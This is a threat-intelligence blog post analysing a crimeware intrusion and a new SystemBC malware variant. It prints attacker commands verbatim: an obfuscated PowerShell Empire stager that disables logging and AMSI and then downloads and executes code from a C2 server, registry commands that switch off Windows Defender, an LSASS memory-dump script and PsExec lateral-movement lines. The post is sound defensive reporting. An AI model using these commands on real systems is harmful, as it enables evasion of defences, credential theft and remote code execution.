{"id":10474,"date":"2021-05-10T09:00:00","date_gmt":"2021-05-10T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/prelude-to-ransomware-systembc\/"},"modified":"2026-05-25T10:18:51","modified_gmt":"2026-05-25T09:18:51","slug":"prelude-to-ransomware-systembc","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/","title":{"rendered":"Prelude to Ransomware: SystemBC"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Prelude to Ransomware:<span class=\"blue-text\">SystemBC<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Endpoint Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Ransomware                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Threat intelligence                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                10 Mai, 2021                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Teilen Sie dies                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/&#038;title=Prelude%20to%20Ransomware:%20SystemBC\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Prelude to Ransomware: SystemBC&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_01d167d1bdfb56c1531d84fefeb7680b\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Callum Roxan<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Sami Ruohonen<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Inhaltliche Navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    W\u00e4hlen Sie einen Abschnitt                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/&#038;title=Prelude%20to%20Ransomware:%20SystemBC\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Prelude to Ransomware: SystemBC&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <h2>Introduction<\/h2>\n<p>In late February 2021, WithSecure\u2019s Managed Detection and Response (MDR) service identified the execution of SystemBC malware as part of a hands on keyboard crimeware intrusion. The intrusion was stopped before the threat actor could reach their objective, but in <a href=\"https:\/\/news.sophos.com\/en-us\/2020\/12\/16\/systembc\/\" target=\"_blank\" rel=\"noopener\">recent reporting<\/a> the use of this malware has been tied to Ransomware activity. WithSecure was also able to identify another recent intrusion conducted by the threat actor where they had deployed Ryuk ransomware.<\/p>\n<p>WithSecure\u2019s analysis of the SystemBC sample identified that this was a new variant of the malware, with several notable differences from previous versions. The sample was executed by a previously undocumented \u201cwrapper\u201d, which WithSecure\u2019s research suggests has been used in combination with multiple malware families common in crimeware intrusions.<\/p>\n<p>This blog shall provide insight in to both the intrusion and the malware sample, so that organizations can be informed to protect themselves from this evolving threat. A detection section is included, which contains actionable takeaways so that organizations can improve their own defenses against this, and similar, threats.<\/p>\n<h2>Intrusion Technical Detail<\/h2>\n<p>The intrusion began in a third-party IT service provider, which had an un-patched VPN appliance that was vulnerable to remote exploitation. The threat actor was able to extract credentials from this device and then access a host with connectivity to the victim network. The threat actor entered the victim network via a Remote Desktop Protocol (RDP) connection using stolen credentials of an administrator account belonging to that third-party IT service provider.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/251.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 1: Initial Access Attack Path<\/p>\n<p>Once the RDP session had connected the threat actor immediately began to enumerate the victim domain and network. With an interactive PowerShell session they used the Windows utilities like net.exe, ping.exe and nltest.exe.<\/p>\n<pre><code class=\"language-bash\">C:\\Windows\\System32\\net.exe group &quot;enterprise admins&quot; \/domain\nC:\\Windows\\System32\\net.exe user &lt;USER&gt; \/domain\nC:\\Windows\\System32\\net.exe group &quot;domain admins&quot; \/domain\nC:\\Windows\\System32\\net.exe group &quot;domain computers&quot; \/domain\nC:\\Windows\\System32\\nltest.exe \/dclist: &lt;DOMAIN&gt;<\/code><\/pre>\n<p>Figure 2: Enumeration Command Lines<\/p>\n<p>Shortly after this they scanned the network using a portable version of Advanced IP Scanner, a tool popular in crimeware circles. The scanner was used to sweep multiple sub-networks for normal service ports and dynamic ranges.<\/p>\n<pre><code class=\"language-bash\">%USERPROFILE%\\Downloads\\Advanced_IP_Scanner_2.5.3850.exe<\/code><\/pre>\n<p>Figure 3: Advanced IP Scanner Path<\/p>\n<p>The scanner was downloaded from the software provider\u2019s website via internet explorer and executed with explorer.exe. WithSecure\u2019s investigation uncovered a forensic artifact that suggests the threat actor was watching a <a href=\"https:\/\/www.youtube.com\/embed\/NCc3xINQL0c?vq=large\" target=\"_blank\" rel=\"noopener\">YouTube video<\/a> on how to use this tool prior to execution.<\/p>\n<p>After initial reconnaissance, the adversary executed a Base64 encoded PowerShell command. The decoded command is included below.<\/p>\n<pre><code class=\"language-bash\">If($PSVERsIONTabLe.PSVERSIoN.MajOR -ge 3){$GPF=[ref].ASsEMBly.GetTypE(&#x27;System.Management.Automation.Utils&#x27;).&quot;GeTFIe`lD&quot;(&#x27;cachedGroupPolicySettings&#x27;,&#x27;N&#x27;+&#x27;onPublic,Static&#x27;);IF($GPF){$GPC=$GPF.GetVALUE($nuLL);If($GPC[&#x27;ScriptB&#x27;+&#x27;lockLogging&#x27;]){$GPC[&#x27;ScriptB&#x27;+&#x27;lockLogging&#x27;][&#x27;EnableScriptB&#x27;+&#x27;lockLogging&#x27;]=0;$GPC[&#x27;ScriptB&#x27;+&#x27;lockLogging&#x27;][&#x27;EnableScriptBlockInvocationLogging&#x27;]=0}$vAl=[CoLLectIonS.GenErIc.DICTIONary[String,SYSTEm.OBJECT]]::New();$val.Add(&#x27;EnableScriptB&#x27;+&#x27;lockLogging&#x27;,0);$VAl.ADd(&#x27;EnableScriptBlockInvocationLogging&#x27;,0);$GPC[&#x27;HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB&#x27;+&#x27;lockLogging&#x27;]=$VAl}ElSe{[SCripTBLOck].&quot;GEtFiE`lD&quot;(&#x27;signatures&#x27;,&#x27;N&#x27;+&#x27;onPublic,Static&#x27;).SeTVaLue($nuLL,(New-ObjecT COllEcTiONs.GenERIC.HashSET[StRINg]))}[ReF].ASSeMBly.GEtTyPE(&#x27;System.Management.Automation.AmsiUtils&#x27;)|?{$_}|%{$_.GEtFiELd(&#x27;amsiInitFailed&#x27;,&#x27;NonPublic,Static&#x27;).SETValue($NULL,$tRUe)};};[SySTEm.NeT.SERVIcePoINTMaNAGeR]::ExpecT100ContInue=0;$wc=NEw-OBJECt SYstEM.NeT.WEBCLIENT;$u=&#x27;Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko&#x27;;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$Wc.HeAdeRS.AdD(&#x27;User-Agent&#x27;,$u);$WC.PRoXy=[System.Net.WeBRequest]::DefaULtWeBProXY;$Wc.PrOXY.CRedeNTiALS = [SysTEm.NeT.CrEDeNtIaLCAChe]::DEFAULtNEtwORKCREdENTiALs;$Script:Proxy = $wc.Proxy;$K=[System.TEXt.ENCoding]::ASCII.GEtBYTES(&#x27;b3a9ff9c3041b9841a771013e1ac9f21&#x27;);$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXor$S[($S[$I]+$S[$H])%256]}};$ser=&#x27;https:\/\/193.29.104.187\/:443&#x27;;$t=&#x27;\/news.php&#x27;;$WC.HeadERs.ADd(&quot;Cookie&quot;,&quot;session=SWk+gWN3HiMjZmI\/X\/6tsGgRVb4=&quot;);$DatA=$WC.DowNloadData($Ser+$t);$IV=$Data[0..3];$DATa=$DATA[4..$data.LenGth];-jOIn[Char[]](&amp; $R $DaTa ($IV+$K))|IEX<\/code><\/pre>\n<p>Figure 4: Decoded PowerShell Command<\/p>\n<p>The command is associated with the PowerShell Empire framework and disables ScriptBlock logging and AMSI before connecting out to an external Command and Control (C2) server. The threat actor was using the default version of PowerShell Empire with the following C2 and UserAgent:<\/p>\n<pre><code class=\"language-bash\">C2: https:\/\/193.29.104[.]187\/news.php\nUser-agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko<\/code><\/pre>\n<p>Figure 5: PSE C2 &amp; User Agent<\/p>\n<p>After establishing C2 communication through PowerShell Empire and conducting additional reconnaissance, the actor disabled Windows Defender with multiple registry changes using reg.exe.<\/p>\n<pre><code class=\"language-bash\">reg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/v DisableAntiSpyware \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/v DisableAntiVirus \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine&quot; \/v MpEnablePus \/t REG_DWORD \/d 0 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableBehaviorMonitoring \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableIOAVProtection \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableOnAccessProtection \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableRealtimeMonitoring \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableRoutinelyTakingAction \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableScanOnRealtimeEnable \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting&quot; \/v DisableEnhancedNotifications \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v DisableBlockAtFirstSeen \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v SpynetReporting \/t REG_DWORD \/d 0 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v SubmitSamplesConsent \/t REG_DWORD \/d 2 \/f\nreg.exe delete &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/f<\/code><\/pre>\n<p>Figure 6: &quot;reg.exe&quot; Command Lines<\/p>\n<p>Immediately after Windows Defender was disabled the actor downloaded an archive from \u201csendspace[.]com\u201d \u2013 an online file sharing platform.<\/p>\n<pre><code class=\"language-bash\">hXXps:\/\/fs12n1.sendspace[.]com\/dl\/2dcbf9eb9e28920a81febd3f0a8cda84\/6039c40226878d2e\/px2kd3\/1.rar<\/code><\/pre>\n<p>Figure 7: Malicious Archive URL<\/p>\n<p>Once extracted from the archive then the file \u201cSvchost.exe\u201d (2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580) was executed. WithSecure\u2019s analysis shows this file is a new variant of the SystemBC malware family. Full analysis of the malware is included later in this post.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/261.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 8: SystemBC Download<\/p>\n<p>With multiple routes of access established to the network the threat actor then downloaded another archive, from the same domain, containing four additional files.<\/p>\n<pre><code class=\"language-bash\">hXXps:\/\/fs12n5.sendspace[.]com\/dl\/5593c4325c0f9c23cb59661893ae9454\/6039c46105fab7d4\/3dugcw\/2.zip<\/code><\/pre>\n<p>Figure 9: Additional Malicious Archive URL<\/p>\n<p>The files downloaded were stored on a share that was mapped for all hosts on the victim network.<\/p>\n<pre><code class=\"language-bash\">servers0.bat\n1.ps1\na.ps1\nPsExec.exe<\/code><\/pre>\n<p>Figure 10: Archive Contents<\/p>\n<p>The first file of interest, servers0.bat, was a batch file that contained a long list of commands to execute the \u201c1.ps1\u201d PowerShell script on multiple hosts using PsExec.exe.<\/p>\n<pre><code class=\"language-bash\">start PsExec.exe -d \\\\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;&quot; -accepteula -s cmd \/c &quot;powershell.exe -ExecutionPolicy Bypass -file \\\\&lt;share&gt;\\l.ps1&quot;\nstart PsExec.exe -d \\\\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;$&quot; -accepteula -s cmd \/c &quot;powershell.exe -ExecutionPolicy Bypass -file \\\\&lt;share&gt;\\l.ps1&quot;\nstart PsExec.exe -d \\\\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;$&quot; -accepteula -s cmd \/c &quot;powershell.exe -ExecutionPolicy Bypass -file \\\\&lt;share&gt;\\l.ps1&quot;\nstart PsExec.exe -d \\\\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;$&quot; -accepteula -s cmd \/c &quot;powershell.exe -ExecutionPolicy Bypass -file \\\\&lt;share&gt;\\l.ps1&quot;\n\u2026<\/code><\/pre>\n<p>Figure 11: Truncated Contents of &quot;servers0.bat&quot;<\/p>\n<p>The PowerShell script \u201c1.ps1\u201d would attempt to create a dump of the <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/secauthn\/lsa-authentication\" target=\"_blank\" rel=\"noopener\">LSASS<\/a> process using rundll32.exe in combination with comsvcs.dll. If successful the threat actor would look to extract any credentials stored in the memory of this process using tools such as Mimiktaz.<\/p>\n<pre><code class=\"language-bash\">$computerName = $env:computername;\n$procid = Get-Process | Where-Object {$_.ProcessName -eq &#x27;lsass&#x27;} | Select-Object Id\nPowershell -c rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump $procid.Id $Env:TEMP$computerName full\nStart-Sleep -s 59\nCopy-Item -Path $Env:TEMP$computerName -Destination &quot;\\\\&lt;hostname&gt;\\&lt;share&gt;\\$($computerName)&quot;<\/code><\/pre>\n<p>Figure 12: Contents of &quot;1.ps1&quot;<\/p>\n<p>In addition, the threat actor deployed a PowerShell script named \u201ca.ps1\u201d that had the capability to further enumerate hosts across the network. Interestingly the file still had the hostname and domain from a previous intrusion of another victim by the group, which allowed WithSecure to notify that victim of the activity. WithSecure did not see any evidence of the execution of this script despite its creation on victim systems by the threat actor.<\/p>\n<pre><code class=\"language-bash\">$path = &quot;\\\\&lt;hostname&gt;.&lt;domain&gt;\\s$\\&quot; + $env:computername;\n$OutputVariable = (cmd.exe \/c tasklist \/v) | Out-File -FilePath &quot;$($path)_task.txt&quot; -Append;\n$OutputVariable = (cmd.exe \/c arp -a) | Out-File -FilePath &quot;$($path)_arp.txt&quot; -Append;\n$OutputVariable = (cmd.exe \/c dir C:\\users) | Out-File -FilePath &quot;$($path)_users.txt&quot; -Append;<\/code><\/pre>\n<p>Figure 13: Contents of &quot;a.ps1&quot;<\/p>\n<p>The actor was not able to execute any further malicious commands as containment was actioned by the WithSecure MDR service and the victim organization.<\/p>\n<h3>&quot;Svchost.exe&quot; Analysis &#8211; SystemBC<\/h3>\n<p>File Name: svchost.exe<\/p>\n<p>SHA1: f8af1b293aecdb3d1fe038b4b638f283ee852287<\/p>\n<p>MD5: fa93cfe0898c704551cefdfa193d406f<\/p>\n<p>SHA256: 2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580<\/p>\n<p>Path: C:\\Users\\Public\\svchost.exe<\/p>\n<p>Execution Command Line: C:\\Users\\Public\\svchost.exe start<\/p>\n<h2>Wrapper<\/h2>\n<p>The \u201csvchost.exe\u201d binary is a wrapper that contains an encrypted SystemBC payload. When the wrapper executes, it decrypts the payload and injects it into the memory of a child process. The technique used is commonly known as process hollowing.<\/p>\n<p>All the key APIs of wrapper are resolved at runtime. After the resolution routine, it creates a new process using its own command line. A new child process is then created out of the wrapper disk image.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/281.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 14: Process Command Line<\/p>\n<p>The child is launched as suspended, this is done to allow subsequent process injection into the new child process. The wrapper uses NtUnmapViewOfSection to empty the target process memory.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/291.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 15: NtUnmapViewOfSection Code<\/p>\n<p>0x7000 bytes of new memory is allocated into the child process with VirtualAllocEx at offset 0x400000 and the permissions of the section are set to PAGE_EXECUTE_READWRITE with flprotect = 0x40. The SystemBC backdoor is then decrypted and injected into the new memory space with WriteProcessMemory.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/302.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 16: WriteProcessMemory Code<\/p>\n<p>After the required code is injected, the wrapper finally sets the main thread context in the child to point to the correct entry point 0x1000 and calls ResumeThread on the child process. The use of process hollowing ensures the unpacked malicious code is only visible in the process memory and not the on-disk version of the file.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/32.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 17: Wrapper Execution Flow<\/p>\n<p>Pivoting from the debug string found in the wrapper \u201cy:\\test4\\e93\\Debug\\e93.pdb\u201d we can see multiple other samples, with other payloads such as <a href=\"https:\/\/www.virustotal.com\/gui\/file\/9916d1369c9d2d0e64a8d5d9bb185a63386c27949b46fcec479ff024f3326340\/details\" target=\"_blank\" rel=\"noopener\">Bazar Loader<\/a>. The earliest observed malware sample in WithSecure&#x27;s telemetry dates back to December 2019. There were over 300 samples in total that contain a similar PDB path and appear to be the same wrapper. The table below includes a selected few examples.<\/p>\n<p>PDB PathCompilation Time Stampy:\\test4\\104\\Debug\\104.pdb2019-12-15 18:02y:\\test4\\a30\\Debug\\a30.pdb2020-08-09 11:58y:\\test4\\e45\\Debug\\e45.pdb2020-09-06 17:07y:\\test4\\e62\\Debug\\e62.pdb2020-12-01 10:43y:\\test4\\e88\\Debug\\e88.pdb2021-01-11 10:19y:\\test4\\e93\\Debug\\e93.pdb2021-02-23 21:32y:\\test4\\e97\\Debug\\e97.pdb2021-03-02 17:55y:\\test4\\e98\\Debug\\e98.pdb2021-03-10 16:07y:\\test4\\e98\\Debug\\e98.pdb2021-03-13 23:22y:\\test4\\e94\\Debug\\e94.pdb2021-03-20 10:16<\/p>\n<p>The PDB paths suggest a single environment is used to compile the malware. This is likely linked to a single malware developer or team. Artifacts within the binaries suggest that the author is Russian speaking, which aligns with WithSecure&#x27;s knowledge of the wider crimeware actor who conducted the intrusion.<\/p>\n<h2>SystemBC Payload<\/h2>\n<p>As <a href=\"https:\/\/news.sophos.com\/en-us\/2020\/12\/16\/systembc\/\" target=\"_blank\" rel=\"noopener\">reported by Sophos<\/a>, SystemBC is known as an \u201coff-the-shelf\u201d piece of malware, which is bundled with a TOR client to phone home via the TOR network. In an even earlier version, <a href=\"https:\/\/www.proofpoint.com\/us\/threat-insight\/post\/systembc-christmas-july-socks5-malware-and-exploit-kits\" target=\"_blank\" rel=\"noopener\">found by Proofpoint in 2019<\/a>, the malware was using a SOCKS5 proxy. The SystemBC payload analyzed by WithSecure shares a number of key capabilities with the previously reported samples.<\/p>\n<p>At the first time executing it will create a scheduled task for persistence via a COM interface (CLSID: 148BD52A-A2AB-11CE-B11F-00AA00530503). The scheduled task is created from the wrapper image, named \u201cwow64\u201d, given the \u201cstart\u201d argument and scheduled to run every two minutes after the first execution at current time. The CLSID is located in the .data section starting at 0x50C3.<\/p>\n<p>The malware executes files received from the C2 after writing the files out to %TEMP%.  It supports execution of EXE, VBS, BAT, CMD and PS1 file types.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/33.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 18: C2 Identification Routine<\/p>\n<p>PS1 files will be executed with PowerShell using  the parameters \u201c-WindowStyle Hidden -ep bypass \u2013file\u201d and the payload, which is identical to the other public samples analyzed by security researchers. Other file types will be executed via a scheduled task, the same COM interface that is used for its own persistence.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/34.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 19: Execution Flow<\/p>\n<h3>SystemBC: A new variant?<\/h3>\n<p>The sample analyzed by WithSecure also had significant differences to those previously analyzed. The SystemBC payload was smaller than previous 2020 versions, with the size of the unpacked payload being just 28 KB as opposed to the TOR version which is 44 KB. The new version lacked previously observed features such as the TOR client, AV search and binary relocation on disk. The following sections explore those differences in more detail.<\/p>\n<h2>Initialization<\/h2>\n<p>When the SystemBC payload WithSecure analyzed is executed, it will search and create a mutex \u201cwow64\u201d. Then it calls sub_402985 to check if the passed command line argument equals to \u201cstart\u201d. If the mutex was not found and the file was executed with \u201cstart\u201d, it will continue to the sub_401549 to execute the C2 commands.<\/p>\n<figure><img 